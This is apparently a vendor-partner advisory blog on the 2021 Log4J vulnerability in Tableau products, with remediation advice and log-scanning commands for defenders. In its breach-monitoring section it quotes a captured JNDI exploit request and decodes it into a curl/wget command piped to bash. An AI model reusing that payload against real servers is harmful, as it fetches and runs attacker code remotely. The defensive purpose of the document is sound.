The Information Lab will be providing updates to this blog as we continue to work on vulnerability remediation with our customers.
(Last Updated: 20/12/2021 09:49 CET)
Overview
On December 10th, 2021 our SecOps team became aware of a zero-day Java vulnerability in Log4J2 allowing for remote code execution on the host and the potential for loss of control of the system. Log4J is a Java package used in many software applications for generating log files and is also used by Tableau.
Scope of vulnerability
Any software product that runs the Log4J2 package
- The vulnerability condition is disabled by default in version 2.15 and up but still possible.
- The vulnerability condition is enabled by all versions below 2.15 and must be manually disabled in software code if not patched to version 2.15.
Impacted products
- Tableau Online
- Tableau Server
- Tableau Desktop
- Tableau Prep
- Tableau Bridge
Recommended actions
Official announcements
Please monitor official announcements from Tableau/Salesforce on this page: https://status.salesforce.com/generalmessages/826
Please review the advise on this knowledge base article.
Tableau Server: Internet facing
Your server is vulnerable if it’s not patched with the December 19th upgrade. Take your server offline, and install a new server instance with the latest December 19th release and restore from a safe backup (from before December 9th or the first time you’ve found loglines that indicate a breach (see below: monitoring for breaches). Upgrade your environment immediately to the latest patch of December 19th. If you can not update, implement option 2 to mitigate the risk.
Tableau Server: Non-internet facing
We recommend monitoring your network and to discuss further risks with your security operations team. Your server is vulnerable for targeted and chained attacks if an attack can be launched from within your trusted network. Upgrade your environment immediately to the latest patch of December 19th. If you can not update, implement option 2 to mitigate the risk.
Tableau Online
As Tableau Online is a SaaS solution we recommend monitoring the official announcements from Tableau/Salesforce on this as they will take the necessary steps to keep the environment safe.
Tableau Desktop
Upgrade your environment immediately to the latest patch of December 19th. If you can not update, implement option 2 to mitigate the risk.
Tableau Prep
Upgrade your environment immediately to the latest patch of December 19th. If you can not update, implement option 2 to mitigate the risk.
Tableau Bridge
Upgrade your environment immediately to the latest patch of December 19th. If you can not update, implement option 2 to mitigate the risk.
Monitoring for breaches
Please note that we can not guarantee that the following commands will find all breaches as the attacks are still evolving, nor can we guarantee that all breaches found are malicious (they might be scans from security tools). Please consult with your security operations team for guidance.
You can scan your Tableau Server logfiles for potential breaches using the following commands:
Windows
findstr /S /L /M /I jndi C:\ProgramData\Tableau\"Tableau Server"\data\tabsvc\logs\*.log
Linux
grep 'jndi:' --include '*log' -R /var/opt/tableau/tableau_server/data/tabsvc/logs
Responses will look similar to the following:
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy4zNi4yMC4yMDk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuMzYuMjAuMjA5OjgwKXxiYXNo} HTTP/1.1
Base64 decoding the string in the above GET request reveals a genuine exploit attempt to get a bash terminal on the server:
(curl -s <ip>:5874/<ip>:80||wget -q -O- <ip>:5874/<ip>:80)|bash
Note: We’ve masked the actual IPs with <ip> in above example
If you find results then we recommend shutting down the server and restore a safe backup in a new clean environment.
Frequently asked questions
Has The Information Lab been vulnerable?
A small amount of our internal services were detected vulnerable and we’ve immediately restricted access until patches become available. We’ve investigated our services to ensure that no malicious action was taken and we haven’t found any indicators. We remain vigilant on our environment as always.
The Information Lab hosts Tableau Server for us on AWS – what actions are you taking?
We have advised all customers with Internet-facing servers to restrict access to those servers via IP whitelisting on the AWS firewall, until a patch becomes available. We have also enabled the AWS WAF mitigation described above.
Once a patch is released we will be coordinating an upgrade program with all our hosted customers to migrate them to the new version as soon as possible. We deploy using a blue/green approach, so will spin up new infrastructure, from scratch, and restore known-good backups (taken prior to the vulnerability being made public), and decommission the existing infrastructure.
What about The Information Lab Tableau Extensions?
None of the open-source products we offer through our Github page, such as Tableau Extensions (KeepitFresh, ExportAll, ImageViewer) or Web Data Connectors, are affected. The hosting provider we use doesn’t use any Java products for logging.
Tableau will release a maintenance patch with a fix – what can I do to prepare?
When a maintenance release with a fix becomes available it is important to make sure you’re in a good position to safely deploy the update in your environments. Tableau have a useful process map for Preparing for an Upgrade and details on how to perform the upgrade itself can be found here.
How to get more support
If you purchase your Tableau or Alteryx licences from The Information Lab, you can log a support ticket using our support service. If you do not know how to contact our support services please contact your account manager.
Please note that this document will be the primary source of general information for Log4J issues, but please feel free to log a ticket if you have something specific that you would like to ask.
You can additionally raise tickets with Tableau directly using the following link: https://www.tableau.com/support/case
What about Alteryx Server?
Alteryx does not use Log4J and is therefore not vulnerable.
Further information and reading
Comprehensive Log4J resource
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
Log4J Issue Tracking
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
Log4J Issue Explained
Our friends at Interworks have published a blog on the subject
https://interworks.com/blog/2021/12/14/log4j-vulnerability-cve-2021-44228-information/
Legal Disclaimer
1. No liability for any errors or omissions
The information contained in this Blog has been provided by The Information Lab for information purposes only. This information does not constitute legal, professional or commercial advice. While every care has been taken to ensure that the content is useful and accurate, The Information Lab gives no guarantees, undertakings or warranties in this regard, and does not accept any legal liability or responsibility for the content or the accuracy of the information so provided, or, for any loss or damage caused arising directly or indirectly in connection with reliance on the use of such information. Any errors or omissions brought to the attention of The Information Lab will be corrected as soon as possible.
The information in this Blog may contain technical inaccuracies and typographical errors. The information in this Blog may be updated from time to time and may at times be out of date. The Information Lab accepts no responsibility for keeping the information in this website up to date or any liability whatsoever for any failure to do so.
2. Material on this blog does not constitute legal and/or professional advice
Any views, opinions and guidance set out in this website are provided for information purposes only, and do not purport to be legal and/or professional advice or a definitive interpretation of any law. Anyone contemplating action in respect of matters set out in this website should obtain advice from a suitably qualified professional adviser based on their unique requirements.
3. No Warranty or Endorsement
The Information Lab does not make any warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, nor does it assume any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, nor does it represent that its use would not infringe privately owned rights.
4. No responsibility for other websites
When you access other external websites through a link from the website of The Information Lab, please note that The Information Lab has no control over the content on external websites. The links to external websites are provided as a matter of convenience only, and should not be taken as an endorsement by The Information Lab of the contents or practices of those external websites, for which The Information Lab assumes no responsibility or liability.